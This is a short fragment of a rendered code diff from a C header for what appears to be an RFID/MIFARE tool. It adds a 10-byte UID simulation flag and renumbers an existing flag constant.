//#define MIFARE_ULC__COMP_WRITE 0xA0
|
//#define MIFARE_ULC__COMP_WRITE 0xA0
|
||||||
#define MIFARE_ULC_AUTH_1 0x1A
|
#define MIFARE_ULC_AUTH_1 0x1A
|
||||||
|
|
|
@ -212,10 +212,11 @@ typedef struct{
|
||||||
|
|
||||||
|
|
||||||
//Mifare simulation flags
|
//Mifare simulation flags
|
||||||
#define FLAG_INTERACTIVE 0x01
|
#define FLAG_INTERACTIVE 0x01
|
||||||
#define FLAG_4B_UID_IN_DATA 0x02
|
#define FLAG_4B_UID_IN_DATA 0x02
|
||||||
#define FLAG_7B_UID_IN_DATA 0x04
|
#define FLAG_7B_UID_IN_DATA 0x04
|
||||||
#define FLAG_NR_AR_ATTACK 0x08
|
#define FLAG_10B_UID_IN_DATA 0x08
|
||||||
|
#define FLAG_NR_AR_ATTACK 0x10
|
||||||
|
|
||||||
|
|
||||||
//Iclass reader flags
|
//Iclass reader flags
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue